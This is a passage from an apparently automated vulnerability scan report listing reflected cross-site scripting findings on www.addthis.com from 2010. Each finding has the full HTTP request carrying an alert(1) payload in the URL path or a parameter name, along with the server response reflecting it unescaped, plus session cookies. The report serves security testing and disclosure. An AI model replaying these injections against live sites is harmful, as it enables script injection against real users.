HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C75a7b"-alert(1)-"0a892740684/script%3EHOYT-LLC-XSS-POC";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var
...[SNIP]...

2.112. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 49a57<script>alert(1)</script>3b229a5bc8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C49a57<script>alert(1)</script>3b229a5bc8c/script%3EHOYT-LLC-XSS-POC HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C49a57<script>alert(1)</script>3b229a5bc8c/script%3EHOYT-LLC-XSS-POC</strong>
...[SNIP]...

2.113. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 41da8<script>alert(1)</script>0930d1726d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC41da8<script>alert(1)</script>0930d1726d1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC41da8<script>alert(1)</script>0930d1726d1</strong>
...[SNIP]...

2.114. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2d73"-alert(1)-"69586b36faf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POCc2d73"-alert(1)-"69586b36faf";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.115. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a2749<script>alert(1)</script>6a4b41f81b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC?a2749<script>alert(1)</script>6a4b41f81b3=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.2.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT-LLC-XSS-POC?a2749<script>alert(1)</script>6a4b41f81b3=1</strong>
...[SNIP]...

2.116. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b50<script>alert(1)</script>e93df9b1aef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servicesf0b50<script>alert(1)</script>e93df9b1aef/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>servicesf0b50<script>alert(1)</script>e93df9b1aef/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT</strong>
...[SNIP]...

2.117. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad7de"-alert(1)-"5df2828d99b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/servicesad7de"-alert(1)-"5df2828d99b/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ?
...[SNIP]...

2.118. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5766f"-alert(1)-"ba98fa08a3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C5766f"-alert(1)-"ba98fa08a3b/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:12:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C5766f"-alert(1)-"ba98fa08a3b/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combina
...[SNIP]...

2.119. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78312<script>alert(1)</script>0b016d8c0e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C78312<script>alert(1)</script>0b016d8c0e9/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/submit57fdb%3Cscript%3Ealert(1)%3C78312<script>alert(1)</script>0b016d8c0e9/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT</strong>
...[SNIP]...

2.120. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fc54"-alert(1)-"82596acea0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT2fc54"-alert(1)-"82596acea0f HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT2fc54"-alert(1)-"82596acea0f";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.121. http://www.addthis.com/services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMT

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9c29<script>alert(1)</script>f5118c59dad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/submit57fdb%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1705.GMTe9c29<script>alert(1)</script>f5118c59dad HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=r6d67jvi441r6bg5srbf399u47; Coyote-2-a0f0083=a0f022f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:13:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 1659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
